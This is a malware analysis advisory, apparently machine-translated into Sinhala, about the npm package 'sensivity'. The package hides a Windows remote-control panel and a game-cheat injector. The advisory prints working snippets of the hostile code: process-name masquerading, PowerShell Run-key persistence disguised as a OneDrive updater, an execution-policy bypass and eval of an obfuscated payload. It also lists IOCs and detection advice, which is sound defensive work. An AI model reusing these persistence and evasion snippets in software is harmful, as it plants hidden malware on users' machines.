PairLoop: npm පැකේජයේ සැඟවුණු දුරස්ථ පාලක පැනලය

PairLoop: එක් npm පැකේජයක්, අනුවාද හැත්තෑවක් සහ සැඟවුණු Windows දුරස්ථ පාලක පැනලයක්

TL; ඩී

npm පැකේජය සංවේදීතාව තමන්ව "සංවේදීතා පාලන පැනලයක්" ලෙස විස්තර කරයි. Windows මත එය දුරස්ථ පාලක සහ නිරීක්ෂණ මෙවලමක් ලෙස ක්‍රියා කරයි.

එහි පිවිසුම් ස්ථානය, launcher.js, තමන්ගේම ක්‍රියාවලිය Runtime Broker ලෙස නැවත නම් කරයි, නමින් ස්වයංක්‍රීය ආරම්භක Run-key අගයක් ලියයි OneDriveUpdate සැඟවුණු VBScript එකක් හරහා පැකේජය නැවත දියත් කරන, PowerShell සමඟින් -ExecutionPolicy Bypass, ඉන්පසු 6.87 MB ස්වදේශීය මොඩියුලයක් සමඟ 171 KB අපැහැදිලි සේවාදායක ගෙවීමක් තක්සේරු කරයි, sens.node.

එය TCP port 3000 හි දුරකථන යුගල කිරීමේ පාලක පැනලයකට සේවය කරන අතර Windows UIAutomation හරහා ක්‍රියාකාරී බ්‍රවුසරයේ ලිපින තීරු URL කියවන අතර, දෘඪ-කේත කළ YouTube වීඩියෝවක් නරඹයි.

කලින් කළු පෙට්ටි ලෙස කියවුණු කොටස් දෙකක් දැන් විසඳා ඇත. අපැහැදිලි සේවාදායකය, server.obf.js, obfuscator.io RC4 string-array යෝජනා ක්‍රමයක් භාවිතා කරයි; එහි විකේතකය නොබැඳිව නැවත ක්‍රියාත්මක කිරීම (JavaScript ක්‍රියාත්මක කර නැත) තනි බාහිර අන්ත ලක්ෂ්‍යයක් ප්‍රතිසාධනය කරයි — https://izopi.com/check.php — අත්සන් කරන ලද බලපත්‍ර ප්‍රතිචාර සත්‍යාපනය කිරීමට භාවිතා කරන එබ්බවූ RSA පොදු යතුරක් සමඟ.

ස්වදේශීය මොඩියුලය, sens.node, ඇසුරුම් කර නැත: එහි ආයාත වගුව සහ එම්බෙඩඩ් නූල් එය දුරස්ථ-ක්‍රියාවලි එන්නත් කිරීම සහ මතකය කියවීම්/ලිවීම් මගින් මෙහෙයවනු ලබන aimbot, ESP (wall-hack), සහ triggerbot විශේෂාංග සපයන DirectX 11 / Dear ImGui ක්‍රීඩාව තුළ ඇති උඩ තට්ටුවක් ලෙස හඳුනා ගනී.

එහි ඇති නූල් GTA V / FiveM සමඟ අනුකූල වන වාහන ආයතන සහ සිතියම් ස්ථාන යොමු කරයි. npm පැකේජය යනු එම ස්වදේශීය මොඩියුලය වටා ඇති බෙදාහැරීමේ සහ නොනැසී පවතින එතුමයි.

නිර්වචන සංඥාව ක්‍රියාකාරීයි, තාක්ෂණික නොවේ: තනි නිර්නාමික ප්‍රකාශකයෙක් එක් පැකේජයක අනුවාද හැත්තෑවක් පමණ තල්ලු කළේය — 2.5.0 හරහා 2.5.69 — දින කිහිපයක් පුරා, එක් එක් යානය එකම දියත් කිරීම රැගෙන යයි.

ස්ථාපනයන් නොමැත hooks. පැකේජය ආරම්භ කළ විට පමණක් ගෙවීම ක්‍රියාත්මක වේ.

ප්‍රහාරය: එය ක්‍රියාත්මක වන ආකාරය

සංවේදීතාව ගොනු දහයක් නැව්ගත කරයි. package.json විරල ය: ගබඩාවක් නොමැති ක්ෂේත්‍රයක්, බලපත්‍රයක් නොමැති, ප්‍රධාන එකක් සහ launcher.js වෙත යොමු කරන bin අන්වර්ථ නාම දෙකක් (සංවේදීතාව, sens), සහ node launcher.js හි ආරම්භක ස්ක්‍රිප්ට් එකක්. පසු ස්ථාපනයක් හෝ පූර්ව ස්ථාපනයක් නොමැත. npm ස්ථාපනය මත කිසිවක් ක්‍රියාත්මක නොවේ. පරිශීලකයෙකු පැකේජය ආරම්භ කරන විට පහත විස්තර කර ඇති හැසිරීම ක්‍රියාත්මක වේ - bin shim, ආරම්භක ස්ක්‍රිප්ට් හෝ අවශ්‍යතාවයක් හරහා.

තාර බෝලය දියත් කිරීම, අපැහැදිලි සේවාදායකයක්, ස්වදේශීය මොඩියුලයක්, දෘශ්‍ය මූලික ස්ක්‍රිප්ට් එකක් සහ පාලක පැනලය සඳහා පොදු/වෙබ් නාමාවලියක් රැගෙන යයි. launcher.js යනු කියවිය හැකි වාද්‍ය වෘන්දයයි; ධාවන වේලාවේදී වැදගත් වන තර්කය එය පූරණය කරන බ්ලොබ් දෙකෙහි ජීවත් වේ - අපැහැදිලි සේවාදායකයක් සහ සම්පාදනය කරන ලද ස්වදේශීය මොඩියුලයක්, දෙකම පහත විසඳා ඇත.

 ක්‍රියාවලි වෙස් මුහුණක් සහ ව්‍යාජ OneDrive යාවත්කාලීන කරන්නෙකු

ක්‍රියාත්මක කිරීමේ මුල් අවධියේදී launcher.js තමන්ගේම ක්‍රියාවලි නාමය දෙවරක් සකසයි:

   javascript process.title = 'Runtime Broker'; 

Runtime Broker යනු යෙදුම් අවසරයන් මැදිහත් වන නීත්‍යානුකූල Windows ක්‍රියාවලියකි (RuntimeBroker.exe). එයට ගැලපෙන පරිදි Node ක්‍රියාවලියක් නැවත නම් කිරීම යනු Task Manager වෙත ඉක්මන් බැල්මක් දැමීමෙන් අසාමාන්‍ය දෙයක් නොපෙනේ.

Persistence ලියා ඇත්තේ සෘජු රෙජිස්ට්‍රි API එකකට වඩා PowerShell හරහා ය:

javascript execSync(`powershell -NoProfile -Command "$k='HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run';$n='OneDriveUpdate';$v='wscript.exe \"${vbs}\"';Set-ItemProperty -Path $k -Name $n -Value $v -Force|Out-Null"`, { stdio: 'ignore', timeout: 5000 }); 

ස්වයංක්‍රීය ආරම්භක අගය OneDriveUpdate ලෙස නම් කර ඇති අතර, එය පැකේජය වෙත කෙලින්ම යොමු නොකරයි. එය wscript.exe වෙත යොමු කරයි, බණ්ඩල් කරන ලද OneDrive.Standalone.Updater.vbs ක්‍රියාත්මක කරයි. එම ස්ක්‍රිප්ට් එක සැඟවුණු කවුළුවක නෝඩ් launcher.js නැවත දියත් කරයි. Run-key නම සහ VBScript ගොනු නාමය යන දෙකම Microsoft සන්නාමකරණය ණයට ගනී, එබැවින් ස්වයංක්‍රීය ආරම්භක ඇතුළත් කිරීම සාමාන්‍ය OneDrive කාර්යයක් ලෙස කියවනු ලැබේ.

ක්‍රියාත්මක කිරීමේ ප්‍රතිපත්ති මඟ හැරීම සහිත PowerShell

දියත් කිරීම නැවත නැවතත් PowerShell වෙත නිකුත් වේ. ස්කෑනරය තීරණාත්මක ලෙස සලකුණු කරන සින්ක් එක වන්නේ ක්‍රියාත්මක කිරීමේ ප්‍රතිපත්තිය අක්‍රිය කර ජනනය කරන ලද .ps1 දියත් කිරීමයි:

javascript exec('start "Windows PowerShell" powershell -NoProfile -ExecutionPolicy Bypass -File "' + psFile + '"', { cwd: APP_DIR }); 

ක්‍රියාත්මක කිරීමේ ප්‍රතිපත්ති මඟ හැරීම මඟින් එම ආයාචනය සඳහා දේශීය ස්ක්‍රිප්ට්-අත්සන් කිරීමේ පරීක්ෂාව ඉවත් කරයි. ජනනය කරන ලද ස්ක්‍රිප්ට් ඊළඟ කොටසේ විස්තර කර ඇති බ්‍රව්සර්-අධීක්ෂණ සහ කවුළු-අනාවරණ කාර්යය හසුරුවයි.

අපැහැදිලි සේවාදායකය සහ ස්වදේශීය මොඩියුලය

සැකසීමෙන් පසු, launcher.js එහි සැබෑ ගෙවීම පූරණය කර ක්‍රියාත්මක කරයි:

const serverCode = fs.existsSync(path.join(APP_DIR, 'server.obf.js')) ? path.join(APP_DIR, 'server.obf.js') : path.join(APP_DIR, 'server.js'); eval(fs.readFileSync(serverCode, 'utf8'));

server.obf.js යනු _0x-array obfuscation හි 171 KB වේ — සෑම නූලක් සහ හඳුනාගැනීමක්ම දර්ශකයක් මගින් මාරු කරන ලද අරාවකට ප්‍රතිස්ථාපනය කර, පසුව ධාවන වේලාවේදී යොමු කිරීම ඉවත් කරන JavaScript රටාවයි. මෙම යෝජනා ක්‍රමය obfuscator.io විසින් නිපදවන ලද RC4 ප්‍රභේදයයි: තනි විකේතක ශ්‍රිතයක් base64-අරා ඇතුළත් කිරීමක් විකේතනය කර පසුව RC4 එය එක්-ඇමතුම් යතුරකින් විකේතනය කරයි. එම විකේතකය වෙනම ස්ක්‍රිප්ට් එකකින් නැවත ක්‍රියාත්මක කිරීම — පැකේජයේම ජාවාස්ක්‍රිප්ට් එකක් නොව, උපුටා ගත් 821-ඇතුළත් කිරීමේ නූල් අරාව හරහා නැවත ක්‍රියාත්මක කිරීම පමණක් ක්‍රියාත්මක කිරීම — එය පිරිසිදුව දිග හරියි. කුමන මතුපිටද නිහතමානී නමුත් decisive: LICENSE_URL නියතයකට පවරා ඇති එක් බාහිර URL එකක්, https://izopi.com/check.php`; එබ්බවූ RSA PUBLIC_KEY_PEM`; දේශීය පැනලය /api/kill, /api/qr.png, /api/trigger, /api/url, /trigger/off, සහ /trigger/status මාර්ග; සහ child_process, crypto, සහ [Sensivity] sens.node යන නූල් පටවා ඇත — අවසාන එක වන්නේ දියත් කිරීම පටවා ඇති වැඩසටහන් මොඩියුලයට නැවත ලියන නිශ්චිත ලොග් රේඛාවයි. අන්ත ලක්ෂ්‍යය බලපත්‍ර පරීක්ෂාවකි: සේවාදායකයා හඳුනාගැනීමක් පළ කරයි (අපැහැදිලි සේවාදායකය Discord ID එකක් ආකෘති කරයි: %s නූල්) සහ RSA යතුර සේවාදායකයේ අත්සන් කළ ප්‍රතිචාරය සත්‍යාපනය කරයි.

sens.node යනු 6.87 MB සම්පාදිත ස්වදේශීය ඇඩෝනයක් වන අතර එය ඇසුරුම් කර නොමැත — අංශ එන්ට්‍රොපිය 5.6–6.6 හි පිහිටා ඇති අතර PE ආනයන සහ අපනයන වගු නොවෙනස්ව පවතින බැවින් එහි හැකියාවන් කෙලින්ම කියවිය හැකිය. එය napi_register_module_v1 අපනයනය කරයි, එම standard Node N-API ප්‍රවේශ ලක්ෂ්‍යය, එබැවින් eval'd සේවාදායකය එය සරල අවශ්‍යතාවයකින් පූරණය කරයි. එහි ආයාත වගුව යනු tell වේ. KERNEL32 වෙතින් එය OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateRemoteThread, K32EnumProcessModules සහ Process32First/NextW — වෙනත් ක්‍රියාවලියක් ස්ථානගත කිරීම, ඒ තුළ මතකය වෙන් කිරීම සහ එම මතකය කියවීම හෝ ලිවීම සඳහා කැනොනිකල් කට්ටලය ඇද ගනී. USER32 වෙතින් එය GetAsyncKeyState, GetKeyState, mouse_event සහ SetCursorPos ඇද ගනී; එය තිරයේ ඇති ආවරණයක් සඳහා d3d11.dll, D3DCOMPILER_43, සහ dwmapi සහ ජාල ඇමතුම් සඳහා සම්පූර්ණ WINHTTP කට්ටලය සම්බන්ධ කරයි. එහි ඇතුළත් කර ඇති නූල්, විශේෂාංග කට්ටලය අපැහැදිලි බවකින් තොරව නම් කරයි: Aimbot, Aimbot FOV, Box ESP, Skeleton ESP, Triggerbot, ESP Builder, Vehicle ESP, Electron Anticheat detected, සහ Dear ImGui බැනරය Dear ImGui 1.91.3 WIP සක්‍රීය කරන්න. Grapeseed Medical Clinic සහ vehicle-ESP වචන මාලාව වැනි ස්ථානය සහ ආයතන තන්තු GTA V / FiveM සමඟ අනුකූල වේ.

මෙම බෙදීම හිතාමතාම සිදු කරන ලද්දකි: කියවිය හැකි launcher.js ස්කෑනරයක් පහසුවෙන් කියවන කොටස් පමණක් රැගෙන යයි - නොනැසී පැවතීම, වෙස්වළා ගැනීම, eval ඇමතුම - අපැහැදිලි කිරීම එක් බාහිර සත්කාරකය ධාවන කාල සම්බන්ධතා සඟවන අතර, ද්විමය ක්‍රීඩා-උඩිස් ස්ථරය සහ ක්‍රියාවලි-එන්නත් තර්කනය රඳවා ගනී. දියත් කිරීම තුනී, විගණනය කළ හැකි කවචයයි; අපැහැදිලි සේවාදායකය ජාල අනන්‍යතාවය සඟවයි; ස්වදේශීය මොඩියුලය ගෙවීමේ බරයි. අපි ද්විමය ආයාත සහ නූල් කියවූ ලෙස විස්තර කරමු; අපි ඒවායින් ක්‍රියාකරුගේ අරමුණ අනුමාන නොකරමු.

 3000 වරායේ දුරකථන යුගල කිරීමේ පාලක පැනලයක්

දියත් කිරීම TCP port 3000 හි දේශීය වෙබ් සේවාදායකයක් කළමනාකරණය කරන අතර එය තනි ශ්‍රාවකයක් ලෙස සලකයි. එය පවතින සවන්දෙන්නෙකු සඳහා විමසන අතර බන්ධනයට පෙර එය හිස් කරයි:

 javascript execSync('powershell -NoProfile -Command "$c=Get-NetTCPConnection -LocalPort 3000 -State Listen -EA 0; if($c){$c | ForEach-Object { Stop-Process -Id $_.OwningProcess -Force -EA 0 }}"', { stdio: 'ignore', timeout: 5000 }); 

මෙම පැනලය http://localhost:3000 හිදී ළඟා විය හැකි අතර, http://192.168.1.16:3000 හි දෘඪ-කේතනය කරන ලද LAN පසුබැසීමේ URL එකක් ඇත. පොදු/ නාමාවලිය සහ පැනලයේ හැසිරීම QR-යුගලන ප්‍රවාහයකට අනුකූල වේ: දුරකථනයක් කේතයක් පරිලෝකනය කර දුරස්ථ පාලකයක් ලෙස සත්කාරකයට බන්ධනය වේ. දියත් කිරීමේ දී පැහැදිලි පෙළෙහි බාහිර විධාන-සහ-පාලන වසමක් නොපෙන්වයි - නමුත්, ඉහත deobfuscation පෙන්වන පරිදි, එකක් අපැහැදිලි සේවාදායකයේ පවතී: izopi.com බලපත්‍ර අන්ත ලක්ෂ්‍යය. පැනලයම දේශීය සහ LAN-විස්කෝප් කර ඇත; එකම පිටතට යන සත්කාරකය වන්නේ එම බලපත්‍ර පරීක්ෂාවයි.

වෙන් වූ අධීක්ෂක/සේවක ආකෘතියක් ක්‍රියාවලිය සජීවීව තබා ගනී. දියත් කිරීම SENSIVITY_SUPERVISOR සහ SENSIVITY_WORKER පරිසර ධජ සමඟ නැවත බිහි වේ, සෑම දරුවෙකුම සැඟවී ක්‍රියාත්මක වේ, එබැවින් එක් ක්‍රියාවලියක් මරා දැමීමෙන් එය නැවත ආරම්භ කිරීමට මුරකරුවෙකුට ඉතිරි වේ.

බ්‍රව්සර් නිරීක්ෂණය සහ යූ ටියුබ් සංඥාව

වඩාත්ම නිශ්චිත හැසිරීම වන්නේ බ්‍රව්සර් නිරීක්ෂණයයි. launcher.js විසින් ක්‍රියාත්මක වන බ්‍රව්සරයක ලිපින තීරුව කියවීමට Windows UIAutomation ධාවනය කරන PowerShell ගොඩනඟයි:

 javascript '$pattern = $edit.GetCurrentPattern([System.Windows.Automation.ValuePattern]::Pattern)', 

ValuePattern UI මූලද්‍රව්‍යයක පෙළ අන්තර්ගතය ආපසු ලබා දෙයි. බ්‍රවුසරයක ලිපින තීරු සංස්කරණ පාලනයට යොදන විට, එය වින්දිතයා දැනට නරඹන URL එක ආපසු ලබා දෙයි - බ්‍රවුසර දිගුවක් නොමැතිව, තැටියේ පැතිකඩ ස්පර්ශ නොකර, සහ API කොක්කක් නොමැතිව. ජනනය කරන ලද ස්ක්‍රිප්ට් එක $browserNames ලැයිස්තුවක් පුනරාවර්තනය කර පෙරබිම ඇති බ්‍රවුසරයේ URL හෝ කවුළු මාතෘකාව උපුටා ගනී.

එම URL එක තනි දෘඪ-කේතගත ඉලක්කයකට එරෙහිව පරීක්ෂා කෙරේ:

 javascript const TARGET_YOUTUBE_VIDEO_ID = 'wJWta2lO0Lw'; 

YouTube පෙන්වන බ්‍රවුසර කවුළුවක් සඳහා දියත් කිරීමේ යන්ත්‍රය තත්පර තුනක ලූපයක් මත ඡන්දය ප්‍රකාශ කරන අතර, ජනනය කරන ලද PowerShell එක එම වීඩියෝ ID එකට ගැලපෙන Get-YouTubeBrowser / Test-TargetYouTubeUrl යුගලයක් රැගෙන යයි. නිරීක්ෂණය කළ හැකි බලපෑම දෙයාකාර වේ: ක්‍රියාකාරී බ්‍රවුසින් URL එක වින්දිතයාගේ තිරයෙන් කියවනු ලබන අතර, එක් නිශ්චිත YouTube වීඩියෝවක් සමඟ සත්කාරකයාගේ අන්තර්ක්‍රියාව අනාවරණය වේ. අපි යාන්ත්‍රණය සහ ඉලක්කය විස්තර කරමු; අපි ඔවුන්ගෙන් චේතනාවක් අනුමාන නොකරමු.

ලිපින තීරුව කියවනු ලබන්නේ ස්කෑනරය සංවේදී_දත්ත_ගණනය ලෙස ලේබල් කරන දෙයයි - ජාල-හැකි ධාවන කාලයක් පෝෂණය කරන Process::env සහ UIAutomation මූලාශ්‍රයකි. එය හුදකලාව මෘදු පෙනුමක් ඇති අතර UIAutomation මූලාශ්‍රයෙන් අපැහැදිලි සේවාදායකයට දත්ත ජීවන චක්‍රය සොයා ගත් පසු පමණක් නිරීක්ෂණ සඳහා නිරාකරණය වේ.

කාලරේඛාව සහ අනුවාද පරිණාමය

සංවේදීතාව එක් වරක් උඩුගත කිරීමක් නොවේ. ප්‍රකාශක ගිණුමේ මෙම තනි පැකේජයේ ප්‍රකාශිත අනුවාද හැත්තෑවක් පමණ ඇති අතර, සමාලෝචන කවුළුව අතරතුර නව ඒවා පැමිණෙමින් තිබුණි. දියත් කිරීම 2.5.x රේඛාව හරහා විශේෂාංගයෙන් විශේෂාංගයට වර්ධනය වන අතර එහි අඛණ්ඩතාව සහ බර පැටවීම ස්ථාවරව පවතී.

දිනය (UTC) නිරීක්ෂණය කළ අනුවාද දියත් කිරීමේ තත්ත්වය
2026-06-02 2.5.8 - 2.5.46 (25) මූලික QR-පැනල් දියත් කිරීම; ධාවන-යතුරු නොනැසී පැවතීම; අපැහැදිලි සේවාදායකයේ ඇගයීම.
2026-06-03 2.5.53 - 2.5.61 (6) එකම ඇඟිලි සලකුණ; කොන්සෝල-අංශු මාත්‍ර මර්දනය.
2026-06-04 2.5.67, 2.5.68 (2) ඇමුණුම් කළ YouTube නියැලීමේ ඉලක්කය එකතු කිරීම් wJWta2lO0Lw.
2026-06-05 2.5.0 - 2.5.69 (24) පරාසය පුරා හිඩැස් පිරවීම නැවත ප්‍රකාශයට පත් කිරීම; අධීක්ෂක/සේවක මුරකරු.

බාගත කළ නියෝජිතයන් හරහා දියත් කිරීම කියවීම - 2.5.0, 2.5.36, සහ 2.5.69 - ස්ථර හතරක් පෙන්වයි. මුල්ම ගොඩනැගීම් මූලික QR-යුගල කිරීමේ දියත් කිරීම රැගෙන යයි. 2.5.33 සිට UIAutomation ලිපින-තීරු අස්වනු නෙළන්නා දිස්වේ. 2.5.58 සිට අධීක්ෂක-කළමනාකරණ ස්ථරයක් එකතු කරනු ලැබේ. 2.5.64 සිට වෙන් කරන ලද අධීක්ෂක/සේවක මුරකරු කට්ටලය සම්පූර්ණ කරයි. පුරාවට, දේවල් හතරක් කිසිදා වෙනස් නොවේ: OneDriveUpdate ධාවන යතුර, OneDrive.Standalone.Updater.vbs dropper, eval'd server.obf.js සහ sens.node ස්වදේශීය මොඩියුලය.

2026-06-05 රැල්ල කැපී පෙනෙන්නේ එය දින කිහිපයකට පෙර තහවුරු කරන ලද අනුවාදවලට පහළින් පිහිටා ඇති අඩු අනුවාද අංක - 2.5.0 සිට 2.5.15 දක්වා - නැවත ප්‍රකාශයට පත් කළ බැවිනි. බලපෑම රෙජිස්ට්‍රියේ 2.5.x රේඛාවක් වන අතර, සෑම අනුවාදයකම එකම දියත් කිරීම ඇත.

සම්මුති දර්ශක

පහත දැක්වෙන සියලුම දර්ශක පැකේජ තාරබෝලයෙන් කෙලින්ම කියවා ඇත. කියවිය හැකි දියත් කිරීම ලූප්බැක් සහ තනි පුද්ගලික LAN ලිපිනයක් පමණක් රැගෙන යයි; server.obf.js නොබැඳිව deobfuscating කිරීමෙන් izopi.com යන එක් බාහිර සත්කාරක නාමය ප්‍රතිසාධනය කරන ලදී.

වර්ගය දර්ශකයක් සටහන්
පැකේජය npm:sensivity (≈70 අනුවාද, 2.5.0-2.5.69) තනි පැකේජ ප්‍රකාශක; ගබඩාවක් නැත; බලපත්‍ර රහිත.
ගොනුව launcher.js කියවිය හැකි වාද්‍ය වෘන්දය; ප්‍රධාන සහ බින් ඉලක්කය.
ගොනුව server.obf.js (≈171 කි.බ.) obfuscator.io RC4 string-array payload, හරහා පටවන ලදී eval(fs.readFileSync(...)).
ගොනුව sens.node (≈6.87 MB) PE32+ x86-64 නෝඩ් N-API ඇඩෝනය; SHA-256 66b674884042fca2f056d06854325ea0e8bc902d4e3cdaeafd5fe08c7d0aab40.
ගොනුව OneDrive.Standalone.Updater.vbs සැඟවුණු නැවත දියත් කරන්නා (node launcher.js).
ජාල https://izopi.com/check.php අපැහැදිලි සේවාදායකයෙන් බලපත්‍ර/සත්‍යතා අන්ත ලක්ෂ්‍යය ප්‍රතිසාධනය කරන ලදී; කාවැද්දූ RSA පොදු යතුර ප්‍රතිචාර සත්‍යාපනය කරයි.
හැකියාව OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateRemoteThread දුරස්ථ ක්‍රියාවලි එන්නත් කිරීම සහ මතකය කියවීමේ/ලිවීමේ හැකියාව.
හැකියාව Enable Aimbot, Box ESP, Triggerbot, Vehicle ESP, Dear ImGui 1.91.3 WIP aimbot, ESP, සහ triggerbot විශේෂාංග ක්‍රියාත්මක කරන DirectX 11 / ImGui ක්‍රීඩා ආවරණය.
රෙජිස්ට්රි HKCU\Software\Microsoft\Windows\CurrentVersion\Run → OneDriveUpdate ස්වයංක්‍රීය ආරම්භක අගය යොමු කරන්නේ wscript.exe සහ VBScript දියත් කිරීම.
ක්රියාවලිය process.title = 'Runtime Broker' නීත්‍යානුකූල Windows Runtime Broker ක්‍රියාවලිය ලෙස වෙස්වලා ගනී.
චර්යාත්මක powershell -NoProfile -ExecutionPolicy Bypass -File <generated>.ps1 ජනනය කරන ලද PowerShell ස්ක්‍රිප්ට් සඳහා භාවිතා කරන ක්‍රියාත්මක කිරීමේ-ප්‍රතිපත්ති බයිපාස්.
චර්යාත්මක UIAutomation ValuePattern බ්‍රව්සර් ලිපින තීරුව කියවන්න පෙරබිම් බ්‍රවුසර කවුළුවේ URL එක කියවයි.
චර්යාත්මක ඉලක්ක වීඩියෝ හැඳුනුම්පත wJWta2lO0Lw; තත්පර 3ක YouTube මත විමසුම ඇමුණුම්-නිරීක්ෂණ සංඥාව.
ජාල http://localhost:3000, පසුබෑම http://192.168.1.16:3000 QR-යුගලන පාලක පැනලය දේශීයව සහ LAN මත නිරාවරණය කර ඇත.
පරිසර SENSIVITY_SUPERVISOR, SENSIVITY_WORKER වෙන් කරන ලද මුරකරු ක්‍රියාවලි සම්බන්ධීකරණ ධජ.

ආරෝපණය, බලපෑම සහ ආරක්ෂකයින්

මෙම පැකේජය ප්‍රකාශයට පත් කරනු ලබන්නේ ප්‍රකාශිත විද්‍යුත් තැපෑල සත්‍යාපනය නොකළ Gmail ලිපිනයක් වන තනි npm ගිණුමක් මගිනි. ගිණුම දැඩි ලෙස සෘණාත්මක රෙජිස්ට්‍රි කීර්ති නාම ලකුණු දරයි, මෙම එක් පැකේජයක් පමණක් පවත්වාගෙන යන අතර ප්‍රකාශයට පත් කරන අතර සම්බන්ධිත මූලාශ්‍ර ගබඩාවක් නොමැත. අපි විද්‍යුත් තැපෑලෙහි හිමිකාරිත්වය සත්‍යාපනය කර නොමැති අතර අපි ව්‍යාපාරය නම් කරන ලද කිසිදු පුද්ගලයෙකුට නොව ප්‍රකාශක ගිණුමට ආරෝපණය කරමු. දියත් කිරීමේ යන්ත්‍රය පැහැදිලි පෙළ යටිතල පහසුකම් රැගෙන නොයයි, නමුත් එක් බාහිර සත්කාරකය දැන් දන්නා කරුණකි: අපැහැදිලි සේවාදායකය බලපත්‍ර පරීක්ෂාවක් සඳහා izopi.com හා සම්බන්ධ වන අතර, ස්වදේශීය මොඩියුලය - එහි ආයාත වගුවෙන් සහ උපදෙස් අනුව ආපසු හැරවීමට වඩා නූල් වලින් කියවනු ලැබේ - එය තවත් ක්‍රියාවලියක මතකයට එන්නත් කර කියවන ක්‍රීඩා ආවරණයකි.

පාලක පැනල් උපයෝගීතාවයක් අපේක්ෂා කරමින් සංවේදීතාව ස්ථාපනය කර ක්‍රියාත්මක කරන වින්ඩෝස් පරිශීලකයින් මත නිරීක්ෂණය කළ හැකි බලපෑම වැටේ. එම සත්කාරක මත පැකේජය OneDrive කාර්යයක් ලෙස වෙස්වලාගත් ස්වයංක්‍රීය ආරම්භක පැවැත්ම ස්ථාපිත කරයි, පද්ධති ක්‍රියාවලියක් අනුකරණය කිරීමට එය නැවත නම් කරයි, පරිශීලකයා බ්‍රවුස් කරන ඕනෑම දෙයක URL කියවයි, සහ දේශීය ජාලය හරහා දුරස්ථ පාලකයකට යන්ත්‍රය බැඳ තබන යුගල පැනලයක් ඉදිරිපත් කරයි. අධීක්ෂක/සේවක මුරකරු යන්නෙන් අදහස් කරන්නේ තනි ක්‍රියාවලි කිල් එකක් එය ඉවත් නොකරන බවයි; ධාවන යතුරු ඇතුළත් කිරීම නැවත ආරම්භ කිරීමෙන් බේරෙයි. macOS සහ Linux දියත් කිරීම මගින් ඉලක්ක කර නොමැත - අඛණ්ඩතාව, PowerShell සහ UIAutomation මාර්ග Windows-පමණක් වේ.

හැත්තෑ අනුවාද චලනය සලකුණු කිරීම වටී ප්‍රවණතාවයයි. දින කිහිපයකින් එක් පැකේජයක් දුසිම් වාරයක් නැවත ප්‍රකාශයට පත් කිරීම, දැනටමත් ඉවත් කර ඇති ඒවාට පහළින් අනුවාද අංක නැවත පිරවීම ඇතුළුව, ඉවත් කිරීම් අතර රෙජිස්ට්‍රියේ සජීවී පිටපතක් තබා ගන්නා අතර අනුවාද-පිං කළ අවහිර ලැයිස්තු කලකිරීමට පත් කරයි. sensivity@2.5.61 සඳහා වන අවහිර ලැයිස්තු ඇතුළත් කිරීමක් ඊළඟ දිනයේ නැවත ප්‍රකාශයට පත් කරන ලද sensivity@2.5.3 ට එරෙහිව කිසිවක් නොකරයි.

ආරක්ෂකයින්ට පහත සඳහන් දෑ මත ක්‍රියා කළ හැකිය:

  • රෙජිස්ට්‍රි-ප්‍රොක්සි සහ CI අවසර ලැයිස්තු වල පැකේජ නාම සංවේදීතාව සම්පූර්ණයෙන්ම අවහිර කරන්න. තනි අනුවාද ඇමිණීම නැවත ප්‍රකාශන කේඩන්ස් වලට අහිමි වේ; නම කල් පවතින දර්ශකයයි.
  • පරිශීලකයෙකුට මාර්ගයක .vbs ට එරෙහිව wscript.exe ආයාචනා කරන දත්ත සහිත OneDriveUpdate නම් Run අගයක් සොයන්න. අව්‍යාජ OneDrive යාවත්කාලීන කරන්නා මේ ආකාරයෙන් ලියාපදිංචි නොවේ.
  • process.title එක Runtime Broker ලෙස නම් කර ඇති Node.js ක්‍රියාවලියක් පිළිබඳ ඇඟවීම. සැබෑ තැරැව්කරු RuntimeBroker.exe වන අතර Node ධාවන කාලයක් නොවේ.
  • flag npm ස්ථාපන කාලය තුළ සම්පාදනය කරන ලද .node ඇඩෝනයක් සහ සහෝදර .obf.js ගොනුවක eval(fs.readFileSync(…)) නැව්ගත කරන පැකේජ ලබා ගනී. එම යුගලනය - අපැහැදිලි පෙළ ගෙවීමක් අසල පටවා ඇති පාරාන්ධ ස්වදේශීය ද්විමය - ඕනෑම නූලක් IOC වලින් ස්වාධීනව මෙහි ව්‍යුහාත්මක ප්‍රකාශයයි.
  • අනපේක්ෂිත නෝඩ් ක්‍රියාවලියක් මගින් ජනනය කරන ලද port 3000 හි ඕනෑම දේශීයව සම්බන්ධිත ශ්‍රාවකයෙකු කළමනාකරණය කරන ලද Windows අන්ත ලක්ෂ්‍යවල සැකකරුවෙකු ලෙස සලකන්න.
  • සංවර්ධකයෙකුගෙන් හෝ අවසාන පරිශීලක සත්කාරකයෙකුගෙන් izopi.com වෙත පිටතට යන ඉල්ලීම් අවහිර කරන්න හෝ අනතුරු අඟවන්න; එය පැකේජයේ එකම බාහිර අන්ත ලක්ෂ්‍යය වන අතර, අපැහැදිලි සේවාදායකයෙන් /check.php හිදී ළඟා වේ.
  • ඕනෑම බණ්ඩල් කරන ලද .node ඇඩෝනයක් සඳහා, එය විශ්වාස කිරීමට පෙර එහි ආයාත වගුව පරීක්ෂා කරන්න. OpenProcess + VirtualAllocEx + WriteProcessMemory + CreateRemoteThread සංයෝජනය යනු පැකේජය කරන දේ කුමක් වුවත් දුරස්ථ-ක්‍රියාවලි එන්නත් කිරීමකි; මෙහිදී එය Direct3D උඩැතිරියක් සහ aimbot/ESP/triggerbot නූල් අසල පිහිටා ඇත.

ස්ථිතික විශ්ලේෂණය සඳහා pipelines, අනුවාද චලන හරහා ඒත්තු ගැන්වීමේ හැඩය කල් පවතින ය: ජාල නොවන ස්ථාපන පැතිකඩක්, දන්නා පද්ධති-ක්‍රියාවලි නාමයකට ක්‍රියාවලි-මාතෘකා පැවරීමක්, PowerShell හරහා ධාවන-යතුරු ලිවීමක් සහ තැටියෙන් කියවන ගොනුවක ඇගයීමක්. ඒ කිසිවක් ඊළඟ නැවත ප්‍රකාශනයට භ්‍රමණය විය හැකි වසමක්, IP එකක් හෝ අනුවාද අංකයක් මත රඳා නොපවතී.

 ආශ්රිත

[npm: සංවේදීතාව] – මෙහි සාකච්ඡා කර ඇති පැකේජ අනුවාද රේඛාව සඳහා රෙජිස්ට්‍රි පිටුව; ඉවත් කිරීමට යටත් වේ.

sca-මෙවලම්-මෘදුකාංග-සංයුතිය-විශ්ලේෂණ-මෙවලම්
ඔබේ මෘදුකාංග අවදානම් ප්‍රමුඛතාවය දෙන්න, නිවැරදි කරන්න සහ සුරක්ෂිත කරන්න
